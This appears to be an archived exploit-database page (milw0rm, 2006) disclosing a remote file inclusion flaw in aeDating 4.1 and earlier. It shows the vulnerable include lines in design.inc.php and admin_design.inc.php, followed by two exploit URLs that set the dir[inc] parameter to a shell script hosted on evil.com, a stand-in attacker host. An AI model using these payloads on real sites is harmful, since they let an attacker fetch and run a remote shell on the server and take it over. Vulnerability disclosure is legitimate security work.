ad

aeDating <= 4.1 dir[inc] Remote File Include Vulnerabilities



EDB-ID: 2377 CVE: 2006-4870 OSVDB-ID: 28923
Author: NeXtMaN Published: 2006-09-16 Verified: Verified
Exploit Code:   Download Vulnerable App:   N/A

Rating

(0.0)
Prev Home Next
AEDating (all versions) Remote File inclusion.

Vulnerable code:

/inc/design.inc.php
/inc/admin_design.inc.php

require_once( "$dir[inc]db.inc.php" );
require_once( "$dir[inc]prof.inc.php" );

Exploit:
http://site.com/[script_path]/inc/design.inc.php?dir[inc]=http://evil.com/shell.txt?
http://site.com/[script_path]/inc/admin_design.inc.php?dir[inc]=http://evil.com/shell.txt ?

Video:
http://rapidshare.de/files/33316468/AEDating_SQL.rar.html
http://www.megaupload.com/?d=O1W4DX97

# milw0rm.com [2006-09-16]